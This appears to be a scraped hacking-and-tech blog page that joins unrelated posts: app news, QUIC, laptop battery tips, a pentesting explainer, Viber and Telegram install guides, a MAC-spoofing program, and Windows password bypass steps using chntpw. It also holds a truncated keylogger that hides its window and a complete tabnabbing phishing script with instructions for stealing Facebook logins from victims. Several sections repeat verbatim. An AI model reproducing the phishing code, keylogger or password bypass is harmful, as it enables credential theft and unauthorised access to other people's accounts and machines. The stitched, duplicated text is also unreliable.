Facebook Launches Hello App
Let’s see the features in detail:
Here is a quick overview video:
With Facebook Hello, you can easily search the places around you. And if the place, hotel or public place already has a Facebook page, you can directly call them with the number provided on their Facebook page. All this happens, within a fraction of seconds. You just can’t ask for a better service from the social networking giant. Besides that, you can also search for people as you do in the Facebook app.
How to track my smartphone using google search engine command 'Find My Phone' To Locate It
Now, Finding your phone is as simple as searching something on Google...
Instead of searching your phone everywhere, just ask Google where your phone is, and the search engine giant will answer you the exact place where you left your smartphone.
Sound’s interesting!
Google unveiled a new feature on Wednesday that lets you search for your Android smartphone or tablet using the search engine on your desktop computer.
How does it work?
- Log-in to the same Google account on your desktop computer’s browser that you use on your Android smartphone, but before that make sure you must have the latest version of the Google app installed on your smartphone.
- Now type "Find my phone" into Google's search engine, and that’s it.
As soon as you press the enter button, Google will display a map that eventually shows you a location on the map that is accurate to a certain distance, as for example, the map showed me the location of my smartphone was accurate to 35 feet.
However, what if your phone is not visible to you?
Google also offers you a Ring button on the map in order to pinpoint your phone.
You just need to click on Ring icon and the search engine giant will ring your smartphone at full volume for up to five minutes. Moreover, once you hand on it, simply press the power button to turn off the ringing.
Not Google alone…
...a similar feature known as Android Device Manager can also help you locate and ring your Android devices. Also in case your Android device has been stolen, this feature helps you to factory reset your device remotely and reset the password if the device is recovered or erase its data.
Apple also offers a similar tracking feature, known as Find My iPhone, that helps iOS users to track down their missing iPhone or iPad, remotely locate its exact location by ringing, lock it and erase its data.
How to speed up your internet with Google new protocol QUIC
Google is trying every effort to make the World Wide Web faster for Internet users.
The company has announced plans to propose its homemade networking protocol, called Quick UDP Internet Connections (QUIC), to the Internet Engineering Task Force (IETF) in order to make it the next-generation Internet standard.
Probably the term QUIC is new for you, but if you use Google’s Chrome browser then there are chances that you have used this network protocol already.
What is QUIC?
QUIC is a low-latency transport protocol for the modern Internet over UDP, an Internet protocol that is often used for streaming media, gaming and VoIP services.
The search engine giant first unveiled the experimental protocol QUIC and added it to Chrome Canary update in June 2013.
The protocol already included a variety of new features, but the key feature is that QUIC runs a stream multiplexing protocol on top of UDP instead of TCP.
The Idea behind QUIC:
QUIC was developed to speed up latency-sensitive web applications, such as search, by reducing the number of network round-trip time (RTT) that it takes in order to establish a connection to a server.
"The standard way to do secure web browsing involves communicating over TCP + TLS, which requires 2 to 3 round trips with a server to establish a secure connection before the browser can request the actual web page," Google's Chrome team wrote in a blog post.
"QUIC is designed so that if a client has talked to a given server before, it can start sending data without any round trips, which makes web pages load faster."
Here are some QUIC highlights:
- Packet pacing to reduce packet loss
- A pluggable congestion control mechanism
- UDP transport to avoid TCP head-of-line blocking
- High security similar to Transport Layer Service (TLS)
- Packet error correction to reduce retransmission latency
- A connection identifier to reduce reconnections for mobile clients
- Fast (0-RTT) connectivity similar to TLS Snapstart combined with TCP Fast Open.
Here’s the Big Deal:
With the help of QUIC, Google aims to combine the best features of both UDP (User Datagram Protocol) and TCP (Transmission Control Protocol) with modern security tools with the goal of Zero-RTT connectivity overhead and better SPDY support.
SPDY is a networking protocol introduced by Google in 2009 and is recently being built into upcoming HTTP/2 (Hypertext Transfer Protocol version 2) protocol.
SPDY is also supported by some technologies including Google's own Chrome browser, Mozilla's Firefox, Microsoft's Internet Explorer 11, many websites such as Facebook, and some of the software that delivers Web pages to browsers.
"Today, roughly half of all requests from Chrome to Google servers are served over QUIC and we’re continuing to ramp up QUIC traffic, eventually making it the default transport from Google clients — both Chrome and mobile apps — to Google servers," Chrome team explained.
The search engine giant does not know how much faster QUIC would make Web surfing over the Internet, but ultimately its goal is to bring improvements to the web we are using today.
Want to Increase or Extend Battery Life of your Laptop
Every Laptop user is having a great headache about battery backup time. Only new laptops will have a good. While going on using these new laptops may also have a less battery backup time. So now i am going to tell you some ways about "How to Increase the Battery Life of Laptop".
Step 1) Click on start and search for "cmd" in the search box.
Step 2) The result will be shown and it will display an "cmd icon".
Step 3) Right click on it and run as administrator .
Step 4) You will see an command line, now run the command as
- "powercfg-energy" for windows 7 users and
- "powercfg/energy" for windows 8 users
Note: Use the command without Quotes.
Step 5) Now press enter.
- Once you execute command, the system will completely scan your system and it will show some ways to improve your battery life and backup time.
- The result of this will be saved as an HTML file, which will be mostly located at "system 32" folder of so many pc's.
Step 6) Now to access this file follow the path shown in the command. Read that program and understand which program is consuming more power and killing the backup of your battery. Try to fix that problem.It will result in a good battery backup and increase battery life
Meaning of pentesting and how pentesting word derived
Pen-testing or the Penetration testing is a very key term in the ethical hacking scenario. It is a security testing approach often incorporated by most professionals. Penetration is going one step at a time and then mapping out the vulnerabilities in a network. For an ethical hacker, it is very important to know where the vulnerabilities lie in a given network or a protocol. To determine these vulnerabilities and make them into the potential threats for the network, a sequential and step by step approach is adapted. Checking each and every step in a network in an orderly manner is termed as pen-testing. Since the hacker is essentially going deep into the network at each step, it is given the name of penetration. There is no certainty about any loophole or vulnerability and hence every action of the hacker is just a test. This gives the name to this process as Penetration Testing. Penetration testing is often described by the professionals as an "adversarial use by experienced attackers." Other terms have been used to elucidate the same concept: tiger team testing, ethical hacking, and so on. The word "experienced" in this definition is very important: this is because the result of any pen-testing is directly proportional to the skill of the hacker who performs the tests.
Background for Ethical Hackers
Pen-testing is a very good way of testing any software. Companies hire third party pen-testers (this is where the role of ethical hackers comes into the picture) to ensure that their product or software is absolutely free from any loopholes. The pen-testers try to get into the security and perform every test that a potential attacker might try on the software. To put it in other terms, they try to think from the perspective of an outside unethical hacker. A regular pen-test is often advisable in order to ensure a high efficiency of web based applications which have regular updates. Pen-testing requires a special type of person, someone who really enjoys circumventing, subverting, and/or usurping technology built by others.
Author and renowned security tester Joel Scambray describes pen-testing as a very crucial step in any security conduct. "It is even more challenging to sustain an internal pen-test team over the long haul, due to this "cognitive dissonance" as well as the perpetual mismatch between the market price for good pen-testing skills and the perceived value by management across successive budget cycles. Thus, we recommend critically evaluating the abilities of internal staff to perform pen-testing and strongly considering an external service provider for such work", he quotes in his famous release Hacking Exposed.
Conducting Penetration Tests
Whenever a penetration test is to be performed, a proper plan has to be made before hand. Throughout the process, one must stick to the plan. The basic prerequisite of any pen-testing process is to document everything. It should be a written documentation about which node the attack will initiate and which sequence will be followed. There should be audio, video, screenshots for every keytests performed. Ensure that the tests follow a sequence.
Sequences are defined by what your goals are for the penetration tests. Following the sequence becomes of utmost importance not just for adherence to the plan but also for ensuring that you have the right thing being done at every instance of the test conducted.
It is not a good idea to hack a network in the middle way and then enumerate or spread malwares from that point and then eventually coming back to the footprinting. This will make the work done by you very unpredictable for your own employers. Such unplanned pen-test is a sign of an amateur at work.
Subsequent tests should be based on previous results.
Third Party Pen-testing
To ensure that there is no partiality by the organization's internal pen-testers, a third party pen-tester is hired to perform the job. A few points must always be kept in mind while hiring the third party pen-testers to ensure smooth functioning and optimum return on investment. These crucial factors are:
• Liaison : This refers to providing adequate information to the pen-testers about the networks and the software. This will help the pen-tester to get his documentation and footprinting done on the network to be checked or attacked.
• Schedule : Ideally, pen-testing occurs after the availability of beta-quality code but early enough to permit significant changes before ship date should the pentest team identify serious issues. Yes, this is a fine line to walk.
• Deliverables : Make sure that the pen-testers give a brief documented report on the attacks performed and the measures taken. This will help the future pen-testers to get relevant information while making their documentations.
Types of Penetration Tests
There are basically three types of penetration tests which are as follows:
• Black Box Penetration test
• White Box Penetration test
• Grey Box Penetration test
Black Box Penetration test
To put it in simple terms, black box penetration tests are the tests wherein you cannot see inside the box, hence the name black box. This means that the pen-tester has no idea of what is going on in the network. There is no pre-knowledge of the network or the software with the pen-tester. This usually happens with the unethical attackers as they do not have much clue about the network, how it is laid and where it is connected etc.
Only the publicly available information is available with the penetration tester. Everything else is something that the pen-tester has to work on to find the answers. It is the most realistic simulation of an outside attacker as discussed earlier. It is the most time consuming and expensive pen-testing type as a lot of work has to be done to build a nefarious network around the domain to be attacked.
White Box Penetration test
This is the exact opposite of the black box penetration test. While the black box pen-testers are the unethical attackers, the white box pen-testers are the ethical hackers or the insiders of an organization who are hired to perform the pen-tests to find out any loophole in the network. These pen-testers are basically hired. A proper documentation and data is provided to the penetration tester at the beginning of the test by the network owners. It is the best simulation of an inside attack (usually for productive purposes).
It is useful for testing the specific security conducts in the network. It is a less expensive method as a jump start approach. Most of the data is already provided to the pen-tester and all that he needs to do is try to break into the security of the network. All information like the database servers, the database domains, the networks associated with it, the logs and how all of this is connected; everything is given to the white box penetration tester. They are also told about the potential honey parts of the network or in simple terms, the weak links.
Grey Box Penetration test
It is the most common type of penetration testing. As the name suggests, it is nothing but the hybrid of the black box penetration test and the white box penetration test.
Here in this case, some of the information is given to the pen-tester. All the information is not leaked out as there always is some confidential data which one does not wish to give out. This is because there cannot be a total trust relationship with the hired third party pen-tester. A very good example of this is that during pen-testing, the company gives the pen-tester all the data about the IP addresses and the data servers but does not reveal any logs or transactions of the company.
During the onset of the test, some of the information is given out as and when needed or asked by the pen-tester. This information exchange is scheduled during the tests when the tests fail or stall at any particular instance.
There is a proper balance of disclosure and discovery in this form of pen-testing. Grey box pen-testers are often in the consultative role.
Finally, no matter which security testing approach you choose, it is strongly recommended that all testing focus on the risks prioritized during threat modeling. This will lend coherence and consistency to your overall testing efforts that will result in regular progress toward reducing serious security vulnerabilities.
Background for Ethical Hackers
Pen-testing is a very good way of testing any software. Companies hire third party pen-testers (this is where the role of ethical hackers comes into the picture) to ensure that their product or software is absolutely free from any loopholes. The pen-testers try to get into the security and perform every test that a potential attacker might try on the software. To put it in other terms, they try to think from the perspective of an outside unethical hacker. A regular pen-test is often advisable in order to ensure a high efficiency of web based applications which have regular updates. Pen-testing requires a special type of person, someone who really enjoys circumventing, subverting, and/or usurping technology built by others.
Author and renowned security tester Joel Scambray describes pen-testing as a very crucial step in any security conduct. "It is even more challenging to sustain an internal pen-test team over the long haul, due to this "cognitive dissonance" as well as the perpetual mismatch between the market price for good pen-testing skills and the perceived value by management across successive budget cycles. Thus, we recommend critically evaluating the abilities of internal staff to perform pen-testing and strongly considering an external service provider for such work", he quotes in his famous release Hacking Exposed.
Conducting Penetration Tests
Whenever a penetration test is to be performed, a proper plan has to be made before hand. Throughout the process, one must stick to the plan. The basic prerequisite of any pen-testing process is to document everything. It should be a written documentation about which node the attack will initiate and which sequence will be followed. There should be audio, video, screenshots for every keytests performed. Ensure that the tests follow a sequence.
Sequences are defined by what your goals are for the penetration tests. Following the sequence becomes of utmost importance not just for adherence to the plan but also for ensuring that you have the right thing being done at every instance of the test conducted.
It is not a good idea to hack a network in the middle way and then enumerate or spread malwares from that point and then eventually coming back to the footprinting. This will make the work done by you very unpredictable for your own employers. Such unplanned pen-test is a sign of an amateur at work.
Subsequent tests should be based on previous results.
Third Party Pen-testing
To ensure that there is no partiality by the organization's internal pen-testers, a third party pen-tester is hired to perform the job. A few points must always be kept in mind while hiring the third party pen-testers to ensure smooth functioning and optimum return on investment. These crucial factors are:
• Liaison : This refers to providing adequate information to the pen-testers about the networks and the software. This will help the pen-tester to get his documentation and footprinting done on the network to be checked or attacked.
• Schedule : Ideally, pen-testing occurs after the availability of beta-quality code but early enough to permit significant changes before ship date should the pentest team identify serious issues. Yes, this is a fine line to walk.
• Deliverables : Make sure that the pen-testers give a brief documented report on the attacks performed and the measures taken. This will help the future pen-testers to get relevant information while making their documentations.
Types of Penetration Tests
There are basically three types of penetration tests which are as follows:
• Black Box Penetration test
• White Box Penetration test
• Grey Box Penetration test
Black Box Penetration test
To put it in simple terms, black box penetration tests are the tests wherein you cannot see inside the box, hence the name black box. This means that the pen-tester has no idea of what is going on in the network. There is no pre-knowledge of the network or the software with the pen-tester. This usually happens with the unethical attackers as they do not have much clue about the network, how it is laid and where it is connected etc.
Only the publicly available information is available with the penetration tester. Everything else is something that the pen-tester has to work on to find the answers. It is the most realistic simulation of an outside attacker as discussed earlier. It is the most time consuming and expensive pen-testing type as a lot of work has to be done to build a nefarious network around the domain to be attacked.
White Box Penetration test
This is the exact opposite of the black box penetration test. While the black box pen-testers are the unethical attackers, the white box pen-testers are the ethical hackers or the insiders of an organization who are hired to perform the pen-tests to find out any loophole in the network. These pen-testers are basically hired. A proper documentation and data is provided to the penetration tester at the beginning of the test by the network owners. It is the best simulation of an inside attack (usually for productive purposes).
It is useful for testing the specific security conducts in the network. It is a less expensive method as a jump start approach. Most of the data is already provided to the pen-tester and all that he needs to do is try to break into the security of the network. All information like the database servers, the database domains, the networks associated with it, the logs and how all of this is connected; everything is given to the white box penetration tester. They are also told about the potential honey parts of the network or in simple terms, the weak links.
Grey Box Penetration test
It is the most common type of penetration testing. As the name suggests, it is nothing but the hybrid of the black box penetration test and the white box penetration test.
Here in this case, some of the information is given to the pen-tester. All the information is not leaked out as there always is some confidential data which one does not wish to give out. This is because there cannot be a total trust relationship with the hired third party pen-tester. A very good example of this is that during pen-testing, the company gives the pen-tester all the data about the IP addresses and the data servers but does not reveal any logs or transactions of the company.
During the onset of the test, some of the information is given out as and when needed or asked by the pen-tester. This information exchange is scheduled during the tests when the tests fail or stall at any particular instance.
There is a proper balance of disclosure and discovery in this form of pen-testing. Grey box pen-testers are often in the consultative role.
Finally, no matter which security testing approach you choose, it is strongly recommended that all testing focus on the risks prioritized during threat modeling. This will lend coherence and consistency to your overall testing efforts that will result in regular progress toward reducing serious security vulnerabilities.
How to Install Viber for Linux
Viber, one of the best free communication applications, is now available for Linux. Viber for Linux lets you send free messages and make free calls to other Viber users on any device and network, in any country! Viber syncs your contacts and messages with your mobile device.
Viber, as of now, is only available for the 64-bit linux operating systems in the form of debian and rpm packages. Viber can be downloaded from the official source here.
Installation of viber:
Once downloaded the 64-bit debian package of viber, it can be simply installed with dpkg:
coolcoder@PGGT925:~$ sudo dpkg -i viber.deb
[sudo] password for coolcoder:
Selecting previously unselected package viber.
(Reading database ... 249437 files and directories currently installed.)
Unpacking viber (from viber.deb) ...
Setting up viber (3.1.2.3) ...
Processing triggers for desktop-file-utils ...
Processing triggers for bamfdaemon ...
Rebuilding /usr/share/applications/bamf.index...
Processing triggers for gnome-menus ...
[sudo] password for coolcoder:
Selecting previously unselected package viber.
(Reading database ... 249437 files and directories currently installed.)
Unpacking viber (from viber.deb) ...
Setting up viber (3.1.2.3) ...
Processing triggers for desktop-file-utils ...
Processing triggers for bamfdaemon ...
Rebuilding /usr/share/applications/bamf.index...
Processing triggers for gnome-menus ...
To activate viber on Linux machine, there is a pre-requirement that you must have viber installed and activated on your mobile phone. So, first install and activate the viber on your mobile device which can be an android, ios or a windows based.
Once installed, viber needs to be activated inorder to start functioning on the Linux box as you do for the android device.
Let me quickly walk you through the installation of viber on android based mobile device.
Once installed, viber needs to be activated inorder to start functioning on the Linux box as you do for the android device.
Let me quickly walk you through the installation of viber on android based mobile device.
Now, once we have setup and activated viber on android mobile device, its time to activate viber on our linux system.
When you start the viber for the first time on your linux box, it asks if you have viber working on your mobile device and once you confirm the same with your mobile number, it sends an activation code via sms required to activate the viber on linux.
Enter the code to activate viber on linux and there you are with viber all setup and working on your linux machine.
As mentioned earlier, there is no official viber 32-bit package for linux but this can be done using applications like wine & crossover. We will take a 32-bit windows installer for viber and install it on ubuntu 12.04 32-bit.
When you start the viber for the first time on your linux box, it asks if you have viber working on your mobile device and once you confirm the same with your mobile number, it sends an activation code via sms required to activate the viber on linux.
Enter the code to activate viber on linux and there you are with viber all setup and working on your linux machine.
As mentioned earlier, there is no official viber 32-bit package for linux but this can be done using applications like wine & crossover. We will take a 32-bit windows installer for viber and install it on ubuntu 12.04 32-bit.
#sudo apt-get install wine
#wget http://download.cdn.viber.com/cdn/desktop/windows/ViberSetup.exe
#wine ViberSetup.exe
#wget http://download.cdn.viber.com/cdn/desktop/windows/ViberSetup.exe
#wine ViberSetup.exe
How to install Telegram App on Ubuntu
Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed. Developed and maintained by an India based company, telegram is available for multiple platforms like android, ios, windows, mac, linux etc. Telegram users can exchange encrypted and self-destructing messages, photos, videos and documents and all the file types are supported. This app is more or less similar to whatsapp but the better part is, it is available for almost all the platforms unlike whatsapp.
Download Telegram Messenger:
The latest version available for telegram application is v0.7.6 which can downloaded for all of the above platforms from the official source. The best thing about telegram is, it is accessible via web browser as well, with this url.
Installation of Telegram Messenger on Ubuntu:
Unlike viber, which i had demonstrated earlier, telegram is available for Linux operating system in both 32-bit & 64-bit architectures. For linux desktop, the tar versions are available to download which facilitate direct launching of the telegram app without any need to install.
Once downloaded, untar the application tar file and you will have the launcher for the telegram desktop application. Double click and launch the application.
Configuration of Telegram:
How to spoof the mac address programmatically
Mac Address or Physical Address:
The MAC address uniquely identifies the network card within the current network segment. It consists of a vendor id that is unique among all network vendors, and a relative id that is unique to the vendor. The address is hard-coded onto the network adapter. But since most of the drivers were developed with the Windows Driver Development kit, the MAC address is read from the Windows registry, when the card is initialized. Now when you are launching any hacking attempt your MAC address is registered at your ISP that your physical address has accessed the particular website and you can be easily identified as MAC address is always unique.
Actually overall concept is that : Our windows operating system adds an extra layer of device conventions with the help of registry and then whenever some tool or website tries to inquire your physical address it picks it from registry. So in reality your device’s physical address or Mac address will remain same and unique but Device’s Physical address or Mac address at windows user level will be spoofed or changed.
The below technique of changing Mac address is converted into an Automated C program by me(haktuts).
Now let us see how to write a C program to Spoof Mac address or Change window’s level Machine address i.e. Physical address or Mac address.
#include <windows.h>
#include <iostream>
#include <conio.h>
using namespace std;void readregistry();
char* spoofmac();int main(int argc, char* argv[])
{readregistry();
spoofmac();}char* spoofmac()
{
char buffer[60];
unsigned long size = sizeof(buffer);
HKEY software;
LPCTSTR location;
char adapternum[10]=””;
char numbers[11]=”0123456789″;
char editlocation[]=”System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0000″;
char macaddress[60];
……….CONTINUED
How to bypass the windows 10 password
Steps to Hack or reset the Windows administrator password:
- Insert Ubuntu Live CD and boot from it.
- Open terminal and install chntpw in Ubuntu. To do so use the following commands.
sudo apt-get update
sudo apt-get install chntpw - Now mount your Windows volume. In my case it was dev/sda1. Replace it with yours.
sudo mkdir /media/WINDOWS
sudo mount /dev/sda1 /media/WINDOWS - Now navigate to the Windows configuration folder.
cd /media/WINDOWS/WINDOWS/system32/config/
- To reset the administrator password enter
sudo chntpw SAM
- After completing this command you will see 5 different choices. Select the 1st one and press Enter and its done.
- Now restart your system, it will not ask any password.
How to build own keylogger for free
How to code keylogger in C programming language : C codechamp has brought you a detailed tutorial on how to write a Keylogger code in C programming.
C program of Keylogger or keystroke logger : Keylogger is a computer program which captures all the key strokes pressed by user in real time. It captures all the keys and write them to some file say log.txt and stores it on computer hard disk. Now sending these logs to emails or FTP address depends upon the type of keylogger that is keylogger is remote keylogger or physical keylogger. Physical keyloggers are useful when you have physical access to that system and can retrieve logs personally. While remote keyloggers can be used from anywhere in the world, the only requirement is that victim must have internet connection. Today we will be writing a C program of Physical keylogger or Keystroke logger which requires physical access of the system. We will be extending our logic in further programs to make it remote keylogger which sends logs to FTP’s and Emails directly. So first of all lets see how simple keylogger program works…
Algorithm for writing a Simple Keylogger :
1. Create an Empty log file for storing keylogs.
2. Intercept keys pressed by user using GetAsyncKeyState() function.
3. Store these intercepted values in file.
4. Hide the Running Window Dialog to make it undetectable.
5. Use while loop to make it running in all conditions.
6. Add Sleep() function to reduce the CPU usage to 0%.
Now let us see the C program of keylogger or keystroke logger which intercepts all the keys pressed by the user and store these pressed keys in log file.
C program of Keylogger or keystroke logger :
#include<iostream>
#include<windows.h>
#include<fstream>
#include<time.h>
using namespace std;
int main()
{
bool runlogger = true;
ofstream log;
//where your logs will be stored
log.open("C:\log.txt", ofstream::out);
//displaying error message when unable to open file
if(log.fail())
{
printf("Error in opening log.txt filen");
}
//Code for hiding running dialog
HWND hideIt = FindWindow("ConsoleWindowClass",NULL);
ShowWindow(hideIt,0);
//Logic for capturing keystokes ........
...................
How to hack the facebook account via Tab Napping method
Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tabnabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..
I will explain this tutorial using attack scenario and live example and how to protect yourself from such stuff.
Let consider a attack scenario:
1. A hacker say(me haktuts) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
2. I (haktuts) sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
Here end’s the attack scenario for advanced tabnabbing.
Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.
Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.
Follow below measure to protect yourself from Tabnabbing:
1. Always use anti-java script plugin’s in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL’s.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.
That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..
Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.
First sample code for doing tabnabbing with the help of iframes:
<!–
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND
Website: http://www.haktuts.com
Version:1.6
–><html>
<head><title></title></head>
<style type=”text/css”>
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body><script type=”text/javascript”>
//———-Set Script Options————–
var REAL_PAGE_URL = “http://www.google.com/”; //This is the “Real” page that is shown when the user first views this page
var REAL_PAGE_TITLE = “Google”; //This sets the title of the “Real Page”
var FAKE_PAGE_URL = “http://www.haktuts.com”; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = “haktuts| Next Generation Hackers Portal”; //This sets the title of the fake page
var REAL_FAVICON = “http://www.google.com/favicon.ico”; //This sets the favicon. It will not switch or clear the “Real” favicon in IE.
var FAKE_FAVICON = “http://www.haktuts.com/favicon.ico”; //Set’s the fake favicon.
var TIME_TO_SWITCH_IE = “4000”; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = “10000”; //Wait this long before switching .
//—————End Options—————–
var TIMER = null;
var SWITCHED = “false”;//Find Browser Type
var BROWSER_TYPE = “”;
if(/MSIE (d.d+);/.test(navigator.userAgent)){
BROWSER_TYPE = “Internet Explorer”;
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement(‘link’);
link.type = ‘image/x-icon';
link.rel = ‘shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName(‘head’)[0].appendChild(link);
}//Create our iframe (tabnab)
var el_tabnab = document.createElement(“iframe”);
el_tabnab.id=”tabnab”;
el_tabnab.name=”tabnab”;
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute(‘src’, REAL_PAGE_URL);//Focus on the iframe (just in case the user doesn’t click on it)
el_tabnab.focus();//Wait to nab the tab!
if(BROWSER_TYPE==”Internet Explorer”){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}function TabNabIt(){
if(SWITCHED == “false”){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;//Change the favicon — This doesn’t seem to work in IE
if(BROWSER_TYPE != “Internet Explorer”){
var links = document.getElementsByTagName(“head”)[0].getElementsByTagName(“link”);
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type==”image/x-icon” && looplink.rel==”shortcut icon”) {
document.getElementsByTagName(“head”)[0].removeChild(looplink);
}
}
var link = document.createElement(“link”);
link.type = “image/x-icon”;
link.rel = “shortcut icon”;
link.href = FAKE_FAVICON;
document.getElementsByTagName(“head”)[0].appendChild(link);
}
}
}
</script></body>
</html>
Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original ‘real’ page or some other Page.
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original ‘real’ page or some other Page.
Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).
Subscribe to:
Posts (Atom)